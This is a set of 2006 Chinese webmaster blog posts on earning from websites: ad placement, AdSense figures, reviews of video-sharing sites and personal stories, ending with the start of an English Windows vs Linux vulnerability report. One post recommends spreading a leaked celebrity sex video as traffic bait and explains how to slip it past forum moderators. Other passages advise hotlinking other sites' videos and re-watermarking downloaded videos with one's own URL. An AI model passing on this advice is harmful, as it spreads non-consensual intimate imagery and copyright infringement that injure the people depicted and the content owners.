网站站长赚钱：SEO成功有了流量，稍微了解点的人看到这里也许都明白了“钱是如何赚的了”。这里还说一下如何选择广告的相关：比如说你的网站是专业卖化妆品的，而你选择投放的广告是宣传汽车的，那就大错特错拉。又比如你开一间商店是用来卖五金的，你又想用一半的地方来卖菜，你说这方法行得通吗？人家看你的商店乱七八糟，看见都想走拉。记住你选择的广告一定要与你的网站相关的，这是很影响网站广告给你带来金钱收入多小的。

结尾：
对和一些认为互联网上很难赚钱的朋友说：今天你记住这句说话,再过3年回头看,新兴的行业会很多很多,有些就从你身边溜过,把握住现在的机会,仔细观察,太多专业网站值得我们去做了,空白的市场也很多很多.
我一直记住我的中学校长对我说的三句名言：
放弃机会的人-非常失败(他对我说这种人是废物)
把握机会的人-比较成功(他对我说这种人是聪明)
创造机会的人-非常成功(他对我说是Very intelligent)

我希望在网络上认识梗多的朋友，欢迎交流，QQ：68890339

从张钰事件谈谈如何抓住热点视频做流量

2006-11-21T21:16:00.001-08:00

今天凌晨一点的时候，突然想起去“忧酷网”找视频素材，无意中发现了“张钰性爱录”象的第一部公开的视频，我看上传时间，是一个小时前。但是浏览量已经达到了100多W，回复评论的人数1000多条，才短短的一个小时，就吸引了这么多人的关注，可见这视频吸引人的程度。
从我做网络推广这工作开始，用得最多，最擅长的就是靠视频素材做流量，有时候选对了一个好的视频素材，再去外面推广下，就能带来上W的IP。所以当我在忧酷发现张钰这热点视频后，马上发布到自己的一个网站上，然后去自己认为流量比较大，也比较适合发布这种素材的论坛推广了一下，很快就见效果了，虽然那时候已经快凌晨2点了，但是也吸引人了不少人来看，因为偶那小网站IIS太低，在线高峰的时候，还出现进不了网站的情况，哎那时候才后悔，为什么不买个IIS高点的空间。
我先来跟大家分析下，张钰性爱录象为什么这么吸引人，可以这么说张钰的这视频是整个2006年中国互联网最吸引人的小视频，比起超女走光视频胡戈新作雅阁女等等视频更来得火爆。张钰性爱录象对男人来说，就等同是黄色录象，加上又是明星的关系。不管好色不好色的男人，看到这标题都会忍不住点来看看。对女人来说，就像个八卦新闻，当然女生也有好奇和好色的成分在里。抛开吸引程度不说，这样的视频也很好出去做推广，A片发去一些人气高的论坛，也会有很多人点击，但是很快就会被管理员栓掉，但是这个视频效果如同A片，但是发布到那些论坛上，管理员没有理由去栓，因为这个从某种程度是热门的新闻事件。虽然超女胡戈雅阁女的视频很火但是比起张钰的这视频，就是小巫见大巫了。
现在来说说本文的重点，如何抓住热点视频，给自己的网站带来流量。如何去发现热点的视频，如何第一时间把热点事件发布到自己网站上，如何去找相关的地方推广。
1：看准热点素材
去年超级女声很火，我也很喜欢看，那时候常去超女相关的贴吧逛逛，发现那里喜欢超女的人好多好多，我想如果发布超女最新比赛的视频一定看的人很多吧，从成都10进7开始，我就把每周超女最精彩的片段发布到公司网站的论坛上，然后去超女相关的论坛推广，那时候公司有自己的100M服务器，我都是自己剪辑视频上传做成在线视频，因为在成都的关系，取得了一些只在成都台播放的独家超女视频，当时去做这样推广的人又特别少，没人抢生意，我的推广效果特别好，那时候一天通过超女来的流量就有2WIP左右。今年很多人都知道到超级女声相关的论坛推广了，效果再也不会像以前那么好了，所以要想取得好的效果，必须要早，在大多数人还没发觉的时候，就开始做。
现在具体跟大家说说如何去发现热门的事件，推荐大家可以通过以下几个方法，1：看百度风云榜，个人觉得百度风云榜挺能反应一些现在流行的元素。2：关注各大门户娱乐头条新闻3：播客网视频的浏览量排行榜4：百度贴吧排行榜

2：发布热点素材
做好了第一步，你已经大概知道现在有些什么最热门，现在要做的就是，如何把这些热点相关的视频，第一时间发布出来。如果专业靠网站为生的个人站长，或好的视频编辑，这点是特别重要的。首先大家要了解这些热门视频的更新时间，拿“超级女声”和“热门曰本动漫”为例。大家先要知道“超级女声”每周是哪天会有比赛，比赛完后，在什么地方能够下载到当天比赛的视频，有条件的网站特别是专业的视频网，最好是自己录制比赛视频，把下载的时间都节约了。专业做网站为生的站长，但是没自己的视频空间，可以通过以下两个方法。1：找到第一时间发布视频下载地址的网站，把视频下载后，在视频上加上自己的网址，然后上传到某个播客网，然后就再发布到自己网站上就OK了。2：如果嫌前面的太麻烦，你就要了解哪个网站视频更新得比较快，然后直接盗用对方的视频连接，发布到自己网站上。
今年超女比赛的时候，我每周6凌晨都是等着新浪把当天的比赛视频发布出来，然后偶发布到自己网站，然后把该去的网站都做了推广，再睡觉。第2天的流量效果就会非常的好。热门动漫是同样的道理，曰本的动漫都是每周更新一集，很多热门动漫的最新视频，有无数的动漫迷在网上等候着，如果你能做到第一时间发布出来，效果可见一般。超女这些不是每周有，大家更多的时候要去发现其它的热点视频，一些突发的热门事件，比如胡戈新作张钰视频等等。这要求大家要有很好的娱乐嗅觉，而且要做到第一时间发布，也是非常辛苦的，但是视频网想做成功，个人网站想要有流量，就必须能吃这些苦，其实这就跟做新闻是一个道理，做到快准新。
3：寻找适合的推广地点
前面两点是一个优秀的视频编辑的基本要求，一个好的视频网的视频编辑，如果做不到以上两点，其它做得再好，我觉得都不会对视频网有多大的帮助。标题做得再吸引人，画面做得再优美，不能在第一时间发布，流量就已经跑到别人那去了。
第3点是一个优秀的个人站站长，或视频推广人员应该做到的，特别是一些才开始起步的视频网。那些已经做得很好，或是有钱的视频网，就不噱这个方式吧。
还是拿超级女声为例，比如我发布了李宇春的最新比赛视频，然后我该去那些地方推广这素材了，主要有以下三个地方。
1：李宇春相关的论坛
百度李宇春吧李宇春官方或非官方的论坛，这些都是非常适合推广此素材的地方，因为这些地方的人都是玉米，点击率肯定比在其它论坛发高很多。
2：超级女声相关的论坛
百度超级女声吧超级粽子吧各大门户论坛基本上都有超级女声的专区这些地方都是适合发布任何和超级女声相关的视频。
3：娱乐八卦相关的论坛
有些人气很旺的论坛，不一定有超女专区，但是就没道理方法这些论坛。所以就可以选择这些论坛的娱乐相关的版区去发布，比如天涯和中国人的娱乐八卦区。

除了以上等地方，如果你有时间，专门拿个QQ号码，加几十个玉米群，第一时间发布李宇春的视频，效果肯定也是很好的。在这里提醒下，一般一个超女的视频发到另外个超女的版区上，一般都是没效果的，因为超女迷之间都有抵触心理，发现其她超女的视频，一般都会被栓掉，比如你把李宇春一个人的比赛视频，发布到周笔畅张靓颖吧去，90%都会被栓的，并不是哪里人气旺，就把视频往那里放，还是要考虑到底适合不，不要浪费不必要的时间。好的推广人员，要做到以最短的时间，做到最好的推广效果。一切还是要靠大家自己去实践，才能掌握其中的诀窍。
今天写得比较多，希望大家有耐心看完，个人觉得自己已经说得很详细了，如果具体到发布什么热点视频，去哪下载最快，去什么地方推广最好，都说出来，就没必要了。很多推广方法都是这样，如果泛滥了就没效果了。聪明的人，肯去实践的人，一定会得到我文中所说的流量效果。做为一个好的视频网，更应该做到以上3点，特别是前两点。网站推广经验分享QQ群号码：25424051（已满） qq群2：26124967（已满） QQ群3 ：26124996

Mcq0544 留
2006-11-19 17：05
本文首发地址：http://hi.baidu.com/mcq0544（转载请保留）

3000独立IP，每天10美元，我的建站经历以及经验分享

2006-11-21T21:15:00.002-08:00

和大家说说我的网赚经验，我的ip不是很高，就不公布我的站了（避免广告嫌疑），挣得的钱也不是很多，但是租服务器的钱是没有问题的，还有点小小的外块。

先说说我的建站经历吧，2002年开始建站，那个时候正赶上互联网泡沫破灭前期，我正好赶上了一个尾巴，那时候网上的免费空间非常多，什么8u8了，什么home4u.china.com，什么etang，都是好称unlimted.我都申请了，也就是这些免费空间勾起了我建站的愿望。也是那时候培养了我建站的兴趣。随着泡沫的破灭，2003年苦苦学习建站知识，锻炼上网的本领。同年申请了自己的第一个域名（现在已经被外国人抢注了），花了100块钱买了第一个付费空间。当时感觉付费空间那叫一个爽呀！可以绑域名，可以使用FTP,支持动态程序！进入2004年，因为当时买域名不知道从谁那买的，续费问题困扰了我好久，最终决定放弃从新开始，又注册了几个域名，做网站也从开始的新奇，转变为要做点实在内容出来，这时我的空间已经成了我的最头疼的问题，一个是容量，一个是稳定性，因为那时自己还是一个学生，根本没有钱来投入，但是网站的流量成平稳上升趋势！每天的独立ip已经稳定在了1000-1500之间。2005年毕业后找到了一份工作试用期底薪1200元，工作的第二个月和别人合租了自己的第一台服务器每月350元。当时的感觉和第一次买付费空间一样。开始的一段时间很好，后来随着合租人的增多，以及网站数量的增加，服务器总是当机，我在合租的第三个月就退了出来，自己单独租了一台配置一般的朋友的铁通双线服务器每月600元，这时我的工作是2000元。网站也就是在这个时候飞速发展起来了，这个时候我做了几个站，每个站的独立ip都上了3000-5000.最多的在百度里面收录的18W条数据。也就是今天的数据。

说说我的赚钱经历，我现在租服务器还是每个月要花销600元，但是我的服务器配置要比以前的好很多，我拿出来10多个G出租给我的6个朋友，都是搞商业的。平均每个人我收了1000块钱，也就是总计收了6000多块钱吧，期间我尝试了myad的广告，以及麒润的广告，都是不尽如人意，但是还是挣了1000多块钱，我也尝试做了baidu联盟，现在每个月能进200多块钱，到现在总计挣了2000左右，另外google的广告我也尝试做了一段时间（重点说一下，扣题嘛），开始的时候摸不到门道，每天0.01美元，和很多老站长学了点知识，作站就要做专业站，手机，服务器，医学，论文，等等专业站的广告配比非常高，另外多多做一些优化，比如页面广告布局，颜色搭配了，位置摆放了都是很讲究的，我说几个网上可能是没有的经验啊（纯经验啊），网页代码一定要简洁不能有错误，广告色系要和你的网站色系搭配，位置很重要，总体来说，左上>右上>中间>下部。最好的位置是画中画的位置。因为大家比较关注文章的内容。同时肯定会看到google的画中画广告！以上几点只要广告配的合理，每天的高点击率肯定会有。我的不能说很高，但是稳定在3%上下。每千次展示都在1.4-3.65之间，我用了其中一个医学站做google广告，每天收入稳定在10元左右。细算一下，我的服务器钱实际已经早被我挣了回来，还有好多纯利润！
下面的数据就是我这几天的数据，看看效果还可以我准备加大投放力度！
2006年10月28日星期六 5,653 174 3.08% USD1.81 USD10.22
2006年10月29日星期日 6,714 162 2.41% USD1.52 USD10.22
2006年10月30日星期一 7,021 164 2.34% USD1.47 USD10.33
2006年10月31日星期二 6,488 141 2.17% USD1.56 USD10.14
2006年11月1日星期三 6,614 198 2.99% USD1.90 USD12.54

所以我劝那些有一定经济基础的站长，不要用别人的服务器了，限制太多，租一台或者买一台吧，肯定赔不了钱的。这也是你的网站发展的根本！

视频类网站的优点，缺点，用户体验，以及其它

2006-11-21T21:15:00.001-08:00

我要播
优点：相比其它我熟悉的播客网，没发现任何优点
缺点：热点视频少，视频不是flash,视频播放地址可以盗连。视频分享代码，是在播放器下加的一个文字连接，回客率低。
用户体验：我要播是我接触最早的一个播客网，所以我才会最先提到它。当时是一个朋友推荐我给51bo做流量推广，我觉得对方要求太高，自己工作忙也忙，没必要赚那点辛苦钱，就做罢了。我申请的第一个视频播客也是在51bo,当时是想上传自己拍的超女长沙10强北京见面会的视频，51bo一个用户可以免费上传100M内的视频，因为有办法盗连接视频地址，传到51bo后，我也能转发到自己论坛上。当时觉得找到一个可以免费上传视频的地方，还特别的心喜，因为一个帐号只能有只能上传１００Ｍ的视频，我还特此多注册了几个帐号备用。后来才知道，播客网都有免费上传视频的功能。才知道51bo的时候已经是半年前了，看下alexa排名没什么变化，网站到是比以前做得更漂亮了，也增加了一些附带功能。但是这里热点视频太少，一般不来这寻找素材，觉得是浪费自己的时间。

　２：100TV
优点：原创短剧播客　提供播客ＰＣ版和手机版的视频下载
缺点：视频更新慢　无视频分享代码　视频不是flash,视频播放地址可以盗连　热点视频少　没站内视频搜索，页面上提供的一个，一搜索竟然连接到百度搜索去了。
用户体验：当初因为工作关系知道的１００ＴＶ，才开始的时候，我还常去那取视频素材，因为那里的视频可以盗连，但是慢慢去得很少了，因为更新实在是太慢了，热点视频更少，后来基本上就不去那了。原创短剧播客是１００ＴＶ的一个特点，但是这个成本很大，所以更新速度很慢，现在１００ＴＶ人气也有限，希望他们能把这个做起来吧。
　
３：偶偶娱乐
优点：视频覆盖面全　热点视频更新及时　
缺点：未发现特别明显的缺点
用户体验：记得当初发现偶偶娱乐，是因为论坛一会员转载了很多偶偶的超女视频，我顺着连接地址找到了偶偶娱乐。发现这里视频特别全，基本上我想得到的热点事件或人物，输入关键词都能找出相关的视频，当时还窃喜终于发现一个找素材的最好地方。但是从这里不断取走很多素材后，新的没上来，慢慢“偶偶娱乐”还是不能满足我的所有需求了，对一些热点人物的视频更新还是太慢，促使我自己再去其它同类的播客网继续寻找素材。只不过偶偶已经是我接触过的播客网中最满意的一个。

４：土豆网
　优点：视频覆盖面全　热点视频更新及时
　缺点：未发现特别明显的缺点
　用户体验：很早前就听说了土豆网的大名，但是在很长一段时间我都不知道土豆是做视频播客的。可能因为当初我都还不知道什么是播客。因为偶偶娱乐不能满足我所有的需求，所以我就开始尝试找同类的播客网。当初试了好几个播客网，最后对土豆和忧酷还比较满意。土豆网的视频挺多，也挺全。但是不知道为什么我还是更喜欢偶偶，可能偶偶的版面我看起更顺眼一点。而且以前土豆网有个很大的缺点，现在好像解决了。就是标题太模糊，比如我搜索李宇春，出来的相关搜索结果的标题全都就是李宇春，虽然视频内容不同，但是没说明具体是什么视频内容，我总不能把一个个视频看完，自己给这视频取标题吧。所以遇到这样情况的时候，我只有放弃土豆的视频。去其它播客网继续寻找同类素材。今天在土豆再试着搜索了一下，标题模糊的问题改善了很多，基本上把这缺点已经解决了。

５：忧酷网
优点：视频覆盖面全　热点视频更新快
缺点：忧酷的分享视频地址，无法在动网论坛播放。
用户体验：忧酷的视频很全，热点也把握得很好。我在知道一个新的热点视频出来后，往往能在忧酷最先找到。在热点视频更新方面，忧酷比偶偶和土豆做得稍微更好一点点。但是忧酷对我来说最大的一个遗憾就是，忧酷的分享播放地址无法在我的动网论坛使用，用falsh播放器发布后，出现的还是一个播放地址。让我的论坛无法转载忧酷的视频，所以忧酷的视频我都是发布到我另外个文章系统模板的网站上。我也不知道是不是我论坛的问题，我想以忧酷的技术，应该能解决这个问题，动网论坛的用户还是很巨大的，不能放弃了这块市场。

６:酷溜网
优点：独特播客广告展现分成模式　视频量大
缺点：站内搜索速度较慢　搜索展现单一　热点视频更新较慢
用户体验：我去过的播客网很多，但是有注册成会员的就两个，一个是前面的51bo，一个就是是酷溜，会在酷溜注册，我就是想体验下，到底上传视频能找倒钱不，可能是因为自己也没去认真做，就上传了一个视频测试下，一个点击都没，谈何找钱。刚才去酷溜试着搜索一些热点的最新视频，但是结果很失望，出来的结果都是上传时间很早以前的。每天靠网友上传量再大，如果抓不住热点，也就是浪费硬盘空间。让我想起我ＭＳＮ上的一个好友签名，写着56.com日新增达3.5Ｗ视频，想起好笑，每天增加这么多视频，不知道又要花多少的硬盘空间，视频不在于多，而在于精。

7：kan51
优点：能抓住热点视频提供视频下载
缺点：更新慢视频资源少　广告凌乱
用户体验：kan51是我很早以前常去取素材的地方，虽然每天更新的视频不多，但是能够抓住热点。基本我所了解的50%热点视频都能在kan51找到。但是kan51并不是一个盗连视频的好地方，因为kan51的视频连接经常换，如果你盗连了他的视频放在自己网站上，如果它把视频地址换了，别人再在你网站打开盗连的视频，就会弹出kan51的网址和一大堆广告。这也是kan51的一种推广手段，故意把视频地址露出来，让别人去盗连，最后免费给他网站做推广，跟现在的播客视频结束后出来相关的视频广告连接一个道理，一种被别人盗连后的推广手段，只不过kan51做得更狠一点。虽然kan51每天更新的视频不多，热点视频更新也不是很快，但是因为是老牌免费视频网的原因，一直有比较稳定的流量，只是现在免费视频越来越多，播客网的出现，也会对kan51这样的传统免费视频网有所挑战。

８：海南综合网
优点：视频缓冲速度超快　抓住动漫热点　
缺点：画面不清晰　动漫资源少
用户体验：海南综合网主要是做动漫视频，可能比起专业的动漫视频网，海南的动漫视频并不算多。但是海南的动漫视频和同类的动漫视频网更新速度算快的，最关键的是海南的动漫视频播放很少出现缓冲的情况。不管我在重庆还是成都还是在北京上网，去海南综合网看动漫，速度总能让我满意。如果说动漫热点的更新速度，海南还比不上那些专业的播客网，但是缓冲速度比播客视频好，所以经常在自己的论坛上转载了播客网的动漫视频后，自己想看动漫的时候，还是去海南综合网看。另外海南的防盗链做得很好，我无发把海南的动漫视频发到自己的论坛上，很多小的动漫论坛，都是连接海南的动漫播放页面，最终免费给海南做流量。海南唯一的缺点就是画面不清晰，有些对画面要求比较高的用户，如果其它地方能看，会尽量不选择在海南看。另外动漫资源毕竟就那几十部，不可能满足所有的动漫迷。但是热点的动漫海南基本上都有了，至少保证了８０％以上动漫用户的需求。

这么多播客网这６个是我稍微比较熟悉的，其余的那些播客网，比如“我乐”“六间房”“青娱乐”我基本上没去过，就不做评价了。以上对这些视频播客网的看法，只是个人的用户体验，因为我都是去取素材，没时间和心情去研究这些播客网到底有些什么吸引人的会员功能。可能今天说的很多有偏颇，但是也代表了一个普通网民的体验感受，我想播客网的产品人员，对自己产品的优缺点都是非常清楚的，我也希望这些播客网能越做越好。
传统的视频网以前我接触得很多，但是播客网出来后，现在把找素材的方向就从传统的视频网转向到播客网，毕竟播客网的视频覆盖面大，更新快，而且视频画面也比较干净，不担心经常换链接。

另外再说下现在兴起的一个视频联盟，和几个视频搜索引擎

１：ＣＣ视频联盟
CC视频联盟是专为论坛免费提供强大稳定的视频功能及流量交换服务为主，用户可上传和在线录制视频。所有加盟成员都将通过公平的机制交换流量，提升你网站的访问量和Alexa排名。
优点：论坛免费上传　流量交换
缺点：视频速度慢　不方便用户查找
用户体验：让我的论坛有了个上传视频的功能，这个感觉挺好，一些比较热点的视频，我也可以自己上传了。因为放播客网的视频最后也会给播客网做流量，但是自己上传视频虽然麻烦点，但是还能为自己的论坛做流量交换。但是加入视频联盟一周多了，没感觉从联盟来了多少流量。所以这个所谓的流量交换对我来说，是个鸡肋。只是多个视频上传功能还是不错的，对论坛本身来说，没有任何损害。不知道是不是因为上传视频的人太多，缓冲的情况并不是特别的好，特别是才打开视频的时候，要等很久。虽然上传的视频很多，但是不方便用户查找。好象ＣＣ视频联盟，还没做联盟视频搜索的功能。
听说ＣＣ视频联盟是挺有背景的公司做的，毕竟要支持这么多论坛每天上传的视频不容易，现在每天新加入联盟的论坛特别多，ＣＣ视频联盟在外面打的广告也不少，我就在５１ＬＡ有看见做广告，如果真的被这家联盟把大多数的论坛都普及了，那对现在的播客网的冲击是很大的，毕竟中国的论坛用户量是非常大的。如果做播客网的网站负责人都还不知道这视频联盟的存在，那就有点说不过去了哦。

２：奇虎视频搜索
优点：覆盖面特别广　搜索速度快　抓取速度快
缺点：偶尔会出现对部分已经收录的播客网最新视频不能及时抓取
用户体验：知道奇虎视频搜索后，我就再也不需要同时把“偶偶”“土豆”“优酷”三个播客网同时打开，搜索同一个热点关键词了。想要寻找什么热点素材，只需要打开奇虎视频搜索，几十个播客网和这热点相关的视频就都出来了。搜索结果页展现效果也很好，第一屏出来的结果是最新收录的相关热点视频，第二第三屏第四屏是按照相关度的排序。能够让用户及时准确的找到自己想搜索的视频，不管是以前的还是最新的。唯一的缺点就是有时候会出现不能及时抓取一些播客网的最新视频，有好几次我寻找一个最新热点连载视频，搜索结果就发现了优酷有，当时我想优酷更新要快这么多啊，后来过了很久还是没发现偶偶和土豆的视频出来，结果去偶偶和土豆的站内搜索，又把那视频搜索出来了。现在奇虎收录的播客网数量已经很多了，视频涉及的面也很广。如果在抓取的速度上做得更好一点，那我以后就不需要再使用“偶偶”“土豆”“优酷”的视频站内搜索了。

３：爱问视频搜索
优点：没看出有什么优点
缺点：产品粘性不强　热点更新慢　
用户体验：爱问视频搜索又分成了网友上传和ＢＴ种子，把爱问当ＢＴ搜索引擎，和那些专业的ＢＴ搜索又差很多，当成视频搜索用，和奇虎比较差别就更大了。不管是视频覆盖度，还也搜索结果页面的展现，还有视频播放页面的展现。特别是爱问的热点视频更新速度很慢，好几次去爱问想寻找一些热点视频，都失望而归。

４：雅虎视频搜索
优点：没看出有什么优点
缺点：搜索结果展现过于简单　
用户体验：雅虎的视频搜索结果，标签就显示了一个视频来源，连视频发布时间都有没有。整个搜索结果页面看起没层次感，很单一。总之一个字特别的差，大家看完我文章后，可以自己去把这个三个视频搜索对比下。

今天一口气写了这么多，感觉手打字都有点痛了，长这么大，我可能也没一次性写过这么长篇的文章。以后不能再写这么长的东西了，我怕太多了，没人有耐心看完。这篇文章主要是自己对一些视频相关网站的用户体验，做站长的朋友，也许与能从我这篇文章了解到，在哪寻找视频素材是比较好的。希望对耐心看完这篇文章的朋友，还是有那么一点点帮助。最后再申明下，这只是我自己的一个用户体验，一家之言，大家只做参考就行了。网站推广经验分享QQ群号码：25424051（已满） qq群2：26124967（已满） QQ群3 ：26124996 　　　　　　　　　　　

我的成长历程(原创)

2006-11-21T21:14:00.000-08:00

呵呵，我第一次接触计算机是在97年，三年级的时候，由于我是在深圳这样的一个信息比较发达的城市，所以很早就接触了。我还记得第一次去的时候，每个人人进去机房都要排队换鞋。老师一直强调说不能在里面吃东西，说什么对身体不好，（md，是怕我们乱丢吧，现在吃什么东西还不都在计算机前解决）那时候的计算机没什么东西好弄，一个星期的一节就是老师严格要求我们打打字，然后说谁完成的就可以自由玩，所谓的玩就是扫雷和纸牌。基本上都是在练打字。后来到了小学六年级的时候，开始教我们办公软件。开始可以上网，可是上网根本不知道要在IE浏览器里打入什么，班里有一个比较“在行”的告诉我们打www.163.com 可是进去看了觉得没什么兴趣。其他同学那时开始偷偷的把家里那个软盘带来学校，那时玩得最火的是超级玛莉，大家都疯狂的互相借。就这样，我错过了那个基础起步的时代
上了初中，也就是01年的时候，初一那时迷上的是篮球，很是喜欢，几乎都把时间放在上面，总想自己能在这方面有出息。呵呵，在我那个地方，我的水平还是属于高手级别的，可以在许多大人眼里用手指碰碰篮筐。家里的那部计算机就荒废了。偶尔玩玩单机的RPG游戏。一次在篮球架下和一个好友聊到上网，他很神气的和我说把家里的那跟电话线插到计算机连起来再播一个什么号码就可以上网了。于是很兴奋的把他所说的号码记起来，打算在一个夜里偷偷的试试。后来还是有一次试了下，可以怎么弄都不对应，我傻傻的拿着一根电话线死死的往网卡里插，虽然不对应，但还是很兴奋的开始拨号。后果可想而知。跟过几个伙伴去了几次网吧。刚开始去到不知道要干什么，一个很老手的家伙给我的机打开了一个联机的游戏“帝国时代”，也许是我的要求高吧，我对他的画面很不满意，就不玩了，转向一个很小孩子气的游戏，大富翁。到了初二，终于开始接触网络了，去网吧弄的就是QQ，可以说是有段时间迷上了。初三的时候，我听到我的后面同桌的一个哥们说班上的一个人现在可以靠网站赚钱。每月都有钱往他的帐户里汇。于是很心动。可是当时觉得要自己做一个网站是多少困难的事，也就是有这个想法而已。可能因为那个同学是台湾人吧，他们似乎很有眼光。就这样，我本该可以很早就进入这一行的时机就因为我没有胆识而失败。。。可惜啊。。到现在都挺后的。。
当时中考因为两分之差没有上高中，而选择了读职高。经过很长一段时间的思考，还是没有去读化学，（因为当时的化学学得不错，英语烂死了）而选择了计算机网络这样的一个专业。很快，因为我的基础比周围的同学都要好很多，不到半年的时间，整个专业系就形成了技术阶级的状况。我和班里的另一个同学组成了第一集团军，摔开了后面同学很远的差距。一开始就一起接触木马，入侵等。我发觉学习计算机一定要多多交流，不要认为自己知道的就好，他不知道的，我知道就厉害，其实这是一个很不好的东西，有东西一定要互相交流，我被这个东西害了不少。所以，现在我有什么都交流出来。我们两个开始在学校的各项比赛里均有名，当时的班级网站在我和他的努力下拿了第一名，被老师拿出去代表学校比赛。呵呵，我在个人网页里拿了第一，他第三，微机安装他拿了第一，我拿了第三，呵呵，总体来说我们来了个平手，可是我自己知道，我还不如他。比如在代码这方面。我和他的差距似乎有一个月的时间。他现在弄了一个下载站，流量还很牛呢（http://www.lv888.com）
才弄了几天，日流量就有几百。
现在出来工作了，弄了一个域名，空间的系统（http://www.42idc.com），就是发觉不管我把价钱调到几乎成本价了。还是一个星期只有几单，百度也收录了七百多个页面，象.com的域名都调到60块钱一年，注册的还不多，我真不知道要赚什么钱。在网络里名气真的很重要有。。我甚至开始觉得真正赚到大钱的网站就只有百度了。还有有时接到一个建站的，我做好以后，在网站的价值都可以好几千了，可是收客户的还是几百。不过，想想自己在帮他的同时也可以学多点技术，心里也是过去了。还有就是在做网站的时候一定要心平气和。不要急，急是没有用的。（呵呵，越写越有点想在抱怨，呵呵）
现在的事就是希望斑竹给我落伍。（原创不容易呀，一个字一个字的敲）
谢谢了

落伍与超越——落伍心情、建议、建站故事

2006-11-21T21:13:00.000-08:00

落伍是有名的，尤其是在喜欢网上捣腾的人们中有名着。上网不久就“落伍”了，常常跑来这里学东西，呆上会潜水。

以前来一次收获不少，好东东真是多，后来嘛，就MJJ的多起来了。

也真是学得些别处没的东东，自己也鼓捣起建站，弄点论坛什么的，最多时也6W多人注册，几千人在线。

建站是摸着石头过河，论坛真是个力气活，通宵达旦，身心俱疲，几个月后照镜子成国宝了，熊猫！

虽然一直来这“借”东西，也与落伍者交易过，却一直没注册ID，总觉得收在收藏夹里，心里记挂着就行了。

后来就发现ID邀请、交换、卖钱了，赶快注了一圈，还是有些没赶上趟。

不过落伍依然可以浏览，一样可以“借”东西，也无所谓了，只是有时想与落伍者交流得绕个弯。

绍兴是个出鲁迅、周恩来、孔乙己、阿Q、师爷的地方，感觉落伍管理者鱼是个淡泊的人，小日子甜蜜着。

落伍是有名的，有点像个大路边的大排档（落伍从来就有草根精神，这点也是吸引人所在），深巷里的咖啡馆（老友鬼鬼来聚会，久处自然感情浓）。

看看满世界的弹窗和飘浮广告，再来看看落伍不变的风格和相对干净的界面，就知了。

现在落伍MJJ多起来，告别夜深人静时，水声哗哗地;牛人呢，有米有锅的，养尊处优起来。

但是，鱼还是努力着的，最近又有版面重大调整中了，希望有序发展中，和谐社会，呵呵

毕竟水和闸的管理不太容易（水利从来是大项目），也不容忽视（搞不好成水灾）。

落伍有名至今，（不要被名字迷惑，那只是绍兴人的幽默而已），其实是超越着的，（当年搞免费的东东很厉害的），

希望落伍一直在网络超越着的。

完了，藏龙卧虎之地，还是潜水去了，安全第一，安全第一。

物以类聚,人以群分,混落伍如何才能使您成为高手？

2006-11-21T21:11:00.000-08:00

物以类聚，人以群分
出处
《战国策·齐策三》《周易·系辞上》《荀子·劝学》
释义
战国时，齐国的淳于髠身材矮小，很有口才。齐宣王想招聘贤士，淳于髠在一天之内就推荐了七人。齐宣王问淳于髠道：“我听说贤士是很难得的，走遍千里，历经百年，也不一定能遇到一个，而你一天之内就推荐七人，不是太多了吗？” 淳于髠说：“不对。鸟有鸟类，兽有兽类，鸟同鸟宿在一起，兽同兽住在一块；如果想找柴胡、桔梗等药材，而到池沼中去找，那就一辈子也找不出一根，因为它们生长在山里，要是到睾黍山、梁父山里去找，那就要几大车都尽管装。这叫做‘物有各类’。我本人就是生活在贤士一类里，所以叫我找贤士，就不用费劲，好比在河里取水、用燧石取火一样方便。我今后还将继续推荐贤士，岂止这七人呢！” “物各有类”，《战国策·齐策》记这个故事时作“物各有畴”。
《易经·系辞》有一句话说：“方以类取，物以群分”。（方，是方法；物，是事物。）
《荀子·劝学》也有这样的话，它是这样说的：“物类之起，必有所始。……草木畴生，禽兽群焉，物各从其类也。” “物各有类”、“物各有畴”、“物以群分”、“物从其类”，这些话的意思都是相仿的，后来一般都说作“物以类聚，人以群分”，比喻坏人往往同坏人在一起。

以上的东西都是文绉绉的，用这些我来说明一下做人的道理，做网赚高手必备的条件．

1 我一直认为，想成为老板，你的朋友就应该是老板，想成为高手，你的朋友应该是高手．
2 保持强烈的好奇心，跟高手交往，从言谈中悟出成功的道理．
3 高手所会的东西，其实就是比你早了解，其实也非常简单的．
3 赚钱多，只是所用的方法和执行能力不同。

我也是从落伍成长的站长，落伍是一个新手的必经之路，但这里仅限于新手之间的交流，仅此而已．
很多新手说这里没有高手来指导，没有高手来发言，没有好东西，好文章．
这些都不能说明高手们不厚道，其实很多人同样非常谦虚．但只能说明，这里不是他们的圈子．他们可能在自己的圈子里非常活跃．
你想像一下，当你每月能赚几万，几十万的时候．还会来这里看最近有什么赚钱的方法、听版主老大的音频吗？
更不可能每天来这里看版主老大的联盟信息播报。想像一下，国内广告就那些，做来做去，都只能赚那些钱。对做过一段时间网站的人，都不具备任何指导意义，我本人比较赞成用提高网站流量来提高收入。

要想成为网赚高手，必须要有良好的周边人际关系，学会调动和整合周边资源。试想一下，你身边的都是食不裹腹的穷站长，你还能从他们身上获取赚钱的道理吗？

相比之下，所谓的网赚高手跟大多数站长来比。他们很多方面是非常弱的，大部分高手都不懂程序，但他们会毫不吝啬地买程序。很多高手，只会用简单的cms，这些他们都要学上半天。

还有，高手们更明白自己要的是什么，对网赚认识非常清楚直接，他们都有相当好的执行能力，他们知道这个东西做一份能赚1000块，就会做Ｎ份。更明白如何把小站做成大站。

很多站长说非常留恋落伍，这是起步和成长的地方，像是他们的初恋。其实感情的专一是好事，但人总要理性的看待人生。我小时候住过的地方，在一个大山里，是值得人留恋，但随着长大却要离开那个地方。这才叫成长，明白吗？

网赚高手们会根据自己的需要，从一个圈子跳进另一个圈子，整合多方资源。他们会和黑客、程序员、美工...，成为朋友。

先随便说到这里，写这么这些，只是一些感触而已...

希望认识更多的朋友，了解不同的思维方法。请加群：30839663

Windows vs Linux Workstation Comparison

2006-11-21T21:09:00.001-08:00

NOTE: I am not asserting that my vulnerability analysis demonstrates that Windows is more secure. Rather, I frequently hear and read Linux advocates making unsupported assertions to the opposite that Linux is inherently more secure than Windows. The "unsupported" part of that bothers me, so I check for myself. What I keep finding is that Linux distributions have more vulnerabilities, more serious vulnerabilities and the data does not support the assertions of security superiority for Linux and Open Source software. Also, this is my own work and any mistakes and opinions are mine and not necessarily those of Microsoft.

This post is part of a multi-part Q3 2006 Vulnerability Report. Here are links to all of the sections, in case you want to read the others:

2006 January through September Vulnerability Trends
Windows vs Linux Workstation Comparison (you are here)
Windows vs Linux Server Comparison (TBD real soon now)
Executive Summary
